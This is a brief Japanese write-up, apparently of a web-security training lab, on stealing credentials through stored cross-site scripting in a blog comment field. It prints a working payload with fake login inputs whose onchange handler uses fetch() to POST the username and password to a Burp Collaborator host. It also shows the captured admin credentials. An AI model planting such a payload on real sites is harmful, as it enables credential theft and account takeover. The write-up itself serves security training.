Hello there, ('ω')ノ

 

クロスサイトスクリプティングを活用してパスワードを取得を。

このラボでは、ブログのコメント機能に脆弱性があって。

この脆弱性を悪用して被害者のユーザ名とパスワードを盗んで。

被害者のアカウントにログインするとのことで。

まずは、脆弱性の確認を。

 

 

一方、コラボレータのペイロードをコピーしておいて。

 

 

脆弱性の存在が確認できたので、下記のスクリプトを投稿することに。

このスクリプトは、コメントを表示する際にPOSTリクエストを発行して。

その中には、ユーザ名とパスワードが含まれていて。

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://4glfpr1femd0nyamebn452y1ys4js8.burpcollaborator.net',{
　method:'POST',
　mode: 'no-cors',
　body:username.value+':'+this.value
});">

 

 

POSTのリクエストボディに被害者のユーザ名とパスワードがあって。

 

　administrator:2q5b0ww193d317gpgyaf

 

 

コラボレータから取得したIDとパスワードでログインすると。

 

 

クリアできた。

 

 

Best regards, (^^ゞ